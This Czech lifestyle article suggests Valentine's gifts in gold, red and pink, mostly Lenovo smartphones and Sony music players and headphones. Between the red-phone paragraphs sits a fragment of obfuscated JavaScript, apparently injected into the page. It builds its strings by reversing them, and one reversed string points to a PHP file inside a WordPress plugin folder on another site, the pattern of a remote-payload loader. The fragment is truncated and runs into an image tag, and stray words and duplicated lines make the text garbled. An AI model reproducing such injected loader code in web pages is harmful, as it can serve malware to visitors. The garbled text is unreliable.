FACESTARŽivotní stylVALENTÝNU SLUŠÍ ZLATÁ, ČERVENÁ A RŮŽOVÁ: OBDARUJTE SVOU POLOVIČKU STYLOVÝM DÁRKEM

VALENTÝNU SLUŠÍ ZLATÁ, ČERVENÁ A RŮŽOVÁ: OBDARUJTE SVOU POLOVIČKU STYLOVÝM DÁRKEM

Jestliže chcete na Valentýna svou polovičku obdarovat a ještě jste se nerozhodli, jaký dárek vybrat, načerpejte inspiraci mezi našimi tipy.

Jestliže chcete na Valentýna svou polovičku obdarovat a ještě jste se nerozhodli, jaký dárek vybrat, načerpejte inspiraci mezi našimi tipy.

Ne všechno, co se třpytí, musí být zlato

Naprosté většině žen uděláte samozřejmě radost zlatým šperkem. Nemusíte však vždy darovat drahé šperky. Zlatá barva jakýchkoli módních doplňků je rozhodně dobrá volba. Můžete vybrat výraznější bižuterii, kabelku, šálu, a dokonce i elektroniku. Zlatá je barva luxusu a požitku. Dopřejte jej tomu, na kom vám záleží.

andpinterest.com/Sydney Jane

Luxusní smartphone Lenovo Vibe X2 najdete právě ve zlaté barvě. Je vybaven špičkovými fotoaparáty (zadní 13Mpx s LED bleskem a přední 5Mpx) a navíc nabízí i funkci pro zkrášlování selfies. Osmijádrový procesor True8Core technology od Media Tek zařídí unikátní multimediální zážitek, a to ve 4G LTE.

Smyslná červená

Výrazná a smyslná červená barva k svátku zamilovaných patří. Červené doplňky budou vždy vynikat, i ty docela maličké – náušnice, náramek, malá kabelka do ruky, ale samozřejmě můžou být i větší. Červená je také barvou lásky, a proto dárek v této barvě bude přesvědčivý.

andpopsugar.com

Stylový červený smartphone Lenovo A319 je nejlepší ve své třídě plně vybavených hudebních telefonů. Pokud vaše polovička ráda poslouchá hudbu, tímhle smartphonem jí rozhodně uděláte radost. Je nezbytností pro každého, kdo streamuje, vytváří vlastní playlisty a sdílí je s přáteli. Telefon obsahuje a 32 GB paměti i pro nějvětší hudební knihovny. Obdarovaná či obdarovaný jistě ocení také přiložená sluchátka a vylepšené Dolby Digital Plus.

and$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahandard_02_Fotor_Collage.jpg“ />

Nadšeným hudebním fanouškům můžete pořídit také hudební přehrávač Sony NWZ-WS613 MP3 Walkman, který je vhodný zvláště pro sportovce, nebo elegantní přehrávač Sony NWZ-A15 Walkman nabitý těmi nejmodernějšími technologiemi. Stejně tak potěší i stylová sluchátka v červeném provedení. Sluchátka MDR-XB450AP mohou být právě takovým doplňkem. Snadno se složí, což je praktické na cestách.

and

Růžová romantika se nikdy neokouká

Jestliže nějaká barva podtrhuje ženskost, tak je to jemná růžová. Růžové doplňky lze kombinovat se všemi neutrálními odstíny a většina žen jistě má nějaký ten růžový kousek ve svém šatníku. Jestliže jich má víc, rozhodně to svědčí o tom, že pěkným doplňkem v růžové barvě jí uděláte radost.

andpinterest.com/Yep Robin Walters

Překvapte ji extra tenkým Lenovo S850 – smartphonem, který vyjádří její styl. Je jako ona, elegantní a zároveň trendy. Ideální pro všechny ženy, kterým záleží na módě, eleganci a kontaktu s okolím. Plně uspokojí touhu být celé hodiny online a chatovat s přáteli. Navíc skvěle doplní její outfit.

and

Související články